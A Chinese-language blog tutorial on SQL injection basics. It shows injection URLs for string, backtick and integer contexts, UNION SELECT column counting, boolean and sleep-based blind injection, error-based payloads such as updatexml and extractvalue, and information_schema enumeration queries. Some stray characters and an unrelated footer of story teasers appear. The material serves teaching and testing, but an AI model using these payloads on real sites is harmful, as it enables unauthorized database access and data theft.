SQL注入基礎(chǔ)

什么是SQL注入

拼接sql得到想要的數(shù)據(jù)或反應(yīng), 而這些sql是不常見(jiàn)的編程邏輯的sql.


SQL語(yǔ)句閉合問(wèn)題

  • 字符串類型閉合
    1. 單引號(hào) - 值的類型是字符串類型
      一般是對(duì)where ,if 等表達(dá)式的條件值進(jìn)行引用
      注入U(xiǎn)RL:

      http://x.x.x.x/name=test' and '1'='1' %23
      

      后端SQL:

      select c1,c2 from db.table where name='test' and '1'='1' #'
      

      解釋一下: %23就是#quote后的值, 其中' and '1'='1' #為注入的SQL

      可以發(fā)現(xiàn), name是字符串類型字段, 字符串類型必須使用單引號(hào)將變量值括起來(lái)才符合SQL語(yǔ)法
      其中 '1'='1' 就是注入點(diǎn), 可以換成自己的語(yǔ)句

    2. 反引號(hào) - 字段名
      一般是對(duì) group by, order by 等對(duì)字段進(jìn)行操作的表達(dá)式中字段名的引用
      注入U(xiǎn)RL:

      http://x.x.x.x/order=name`, if(1=1,1,2) %23
      

      后端SQL:

      select c1,c2 from db.table order by `name`, if(1=1,1,aaa) #`
      

      解釋一下:

      • URL中的name`, if(1=1,1,2) %23, name后的反引號(hào)提前把name閉合,緊接著注入了, if(1=1,1,2) %23, %23#, 直接把后面的sql語(yǔ)句給注釋了
      • if里面的aaa是一個(gè)不存在(亂寫(xiě)的)的字段名, 其中1=1就是注入點(diǎn), 可以換成自己的語(yǔ)句, 觀察頁(yè)面變化來(lái)進(jìn)行盲注
      • order by x,y 可以根據(jù)多個(gè)字段名排序, 當(dāng)后端做了變量檢查可以嘗試使用逗號(hào)多個(gè)字段排序來(lái)注入
      • 注意: group by, order by 字段名 的時(shí)候, 是可加可不加反引號(hào)的, 需要嘗試才知道后端代碼是否加了反引號(hào)
  • 整數(shù)類型閉合

    注入U(xiǎn)RL:

    http://x.x.x.x/id=1 and 1=1 %23
    

    后端SQL:

    select c1,c2 from db.table where id=1 and 1=1 #
    

    解釋一下:
    整數(shù)類型的變量過(guò)濾無(wú)需單引號(hào), 同樣1=1為注入點(diǎn)


SQL注入分類

  • UNION SELECT

    union select 可以將后面的select出的數(shù)據(jù)與前面的select出的結(jié)果集進(jìn)行合并

    image.png

    union select 所需前置條件

    1. union select的字段數(shù)目必須與前面select語(yǔ)句的數(shù)目一致
      辦法: 使用order by N 進(jìn)行猜測(cè)(N是整數(shù), 代表第幾個(gè)字段)
      select depts.id, depts.name from depts order by 1
      這里的1是指字段的位置, 代表使用第一個(gè)字段進(jìn)行排序, 如果使用超出字段數(shù)目的位置參數(shù)排序就會(huì)報(bào)錯(cuò), 由此可以推算出select的字段個(gè)數(shù), 如下圖:

      image.png

    2. union select的字段的類型必須與前面的匹配
      辦法: 使用 null 代替, 因?yàn)樗蓄愋妥侄味贾С?code>null, 如下圖所示
      select depts.id, depts.name from depts where id = 1 union select null, null

      image.png

  • 盲注

    前面的union select 可以將數(shù)據(jù)暴露到頁(yè)面上, 但是有些情況無(wú)法使用union select, 比如:

    • union select 被WAF過(guò)濾
    • http頁(yè)面返回內(nèi)容沒(méi)有變化

    盲注原理:
    顧名思義, 盲注就是我們不能直接的看到數(shù)據(jù)的展示或變化
    盲注SQL:

    select depts.id, depts.name from depts where id = 1 and if(ascii(substring(database(), 1 ,1)) = 101,1,0)
    

    SQL解釋:

    • database() 當(dāng)前數(shù)據(jù)庫(kù)的名字, 在這里是"ec_ops"
    • substring('ec_ops',1,1) 取出'ec_ops'的第一個(gè)字符'e'; 第一個(gè)1是第一次, 第二個(gè)1是步進(jìn)值為1
    • ascii('e') 將'e'字符轉(zhuǎn)成ascii碼; 'e'的ascii為101
    • if(ascii('e')=101,1,0) 當(dāng)ascii('e')=101為true的時(shí)候, 返回1(既true), 否則返回0(既f(wàn)alse);
    • id = 1 and if() -- 當(dāng)左右兩個(gè)條件同時(shí)為true時(shí), 才展示數(shù)據(jù),這樣可以根據(jù)頁(yè)面數(shù)據(jù)變化來(lái)判斷if里面猜測(cè)是否正確, if(xx=xx,1,0) 條件為真的值(例子中是1)也可以換成sleep(1), 成功則睡一秒, 根據(jù)訪問(wèn)延遲來(lái)判斷是否成功

    注: 英文可見(jiàn)字符的ascii碼范圍: 32-127, 逐步實(shí)驗(yàn)可以撞出庫(kù)名的所有字符的ascii碼, 也就得出完整的庫(kù)名

  • 報(bào)錯(cuò)
    使用報(bào)錯(cuò)注入的前置條件
    web后端service開(kāi)啟了報(bào)錯(cuò)開(kāi)關(guān)允許打印到web前端顯示
    • and 1=(updatexml(1,concat(0x3a,(select user())),1)) 獲取當(dāng)前數(shù)據(jù)庫(kù)用戶
    • and extractvalue(0x7e,concat(0x7e,user())) 獲取當(dāng)前數(shù)據(jù)庫(kù)用戶
    • and exp(~(select * from(select user())a)) 獲取當(dāng)前數(shù)據(jù)庫(kù)服務(wù)器類型
    • and linestring(id) 快速獲得當(dāng)前庫(kù)名奈嘿、表名
    • ....

練手

  • MySQL
    information_schema 存放著數(shù)據(jù)庫(kù)的所有信息, 包括有哪些庫(kù), 表, 字段
    • select schema_name from information_schema.schemata -- 所有數(shù)據(jù)庫(kù)名
    • select table_name from information_schema.tables where table_schema = 'db_name' --獲取db_name的所有表
    • select column_name from information_schema.columns where table_schema = 'db_name' and table_name = 'table_name' --獲取db_name.table_name的所有字段名

常見(jiàn)注入點(diǎn)

  • WHERE column_name [ = | like ] value
    select c1,c2 from tables where id = 1 [ and | having ] condition
    使用 and / having 或 "union select" 連接其他sql語(yǔ)句

    image.png

  • ORDER BY column_name

    例1: select id, name from ec_ops.depts order by if(1=1,id,name)
    當(dāng)1=1為真時(shí), 以id進(jìn)行排序, 否則以name排序, 1=1可以換成其他sql語(yǔ)句
    注意: 如果將if里的id換為sleep(1), 每條數(shù)據(jù)都會(huì)睡一次, 如果有300條數(shù)據(jù)則睡300秒, 即使加limit 1也沒(méi)用 慎用

    例2: select id, name from ec_ops.depts order by rand()
    隨機(jī)排序

    例3:

    select id from depts order by 
        case 
            when 1=1          # 當(dāng)1=1為真以id排序
                then id 
            when 1=2          # 當(dāng)1=2為真以name排序
                then name
            when 1=3          # 當(dāng)1=3為真以title排序
                then title
            else author       # 以上條件都不符合則以author排序
        end
    

    總結(jié): order by就是利用不同字段排序, 來(lái)觀察數(shù)據(jù)變化從而進(jìn)行盲注

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市夯到,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌笼蛛,老刑警劉巖奴艾,帶你破解...
    沈念sama閱讀 217,826評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件橄妆,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡倒彰,警方通過(guò)查閱死者的電腦和手機(jī)审洞,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,968評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人芒澜,你說(shuō)我怎么就攤上這事仰剿。” “怎么了痴晦?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,234評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵南吮,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我誊酌,道長(zhǎng)部凑,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,562評(píng)論 1 293
  • 正文 為了忘掉前任碧浊,我火速辦了婚禮涂邀,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘箱锐。我一直安慰自己比勉,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,611評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布驹止。 她就那樣靜靜地躺著浩聋,像睡著了一般。 火紅的嫁衣襯著肌膚如雪臊恋。 梳的紋絲不亂的頭發(fā)上衣洁,一...
    開(kāi)封第一講書(shū)人閱讀 51,482評(píng)論 1 302
  • 那天,我揣著相機(jī)與錄音抖仅,去河邊找鬼坊夫。 笑死,一個(gè)胖子當(dāng)著我的面吹牛撤卢,可吹牛的內(nèi)容都是我干的践樱。 我是一名探鬼主播,決...
    沈念sama閱讀 40,271評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼凸丸,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了袱院?” 一聲冷哼從身側(cè)響起屎慢,我...
    開(kāi)封第一講書(shū)人閱讀 39,166評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎忽洛,沒(méi)想到半個(gè)月后腻惠,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,608評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡欲虚,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,814評(píng)論 3 336
  • 正文 我和宋清朗相戀三年集灌,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,926評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡欣喧,死狀恐怖腌零,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情唆阿,我是刑警寧澤益涧,帶...
    沈念sama閱讀 35,644評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站驯鳖,受9級(jí)特大地震影響闲询,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜浅辙,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,249評(píng)論 3 329
  • 文/蒙蒙 一扭弧、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧记舆,春花似錦鸽捻、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,866評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至盛正,卻和暖如春删咱,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背豪筝。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,991評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工痰滋, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人续崖。 一個(gè)月前我還...
    沈念sama閱讀 48,063評(píng)論 3 370
  • 正文 我出身青樓敲街,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親严望。 傳聞我的和親對(duì)象是個(gè)殘疾皇子多艇,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,871評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容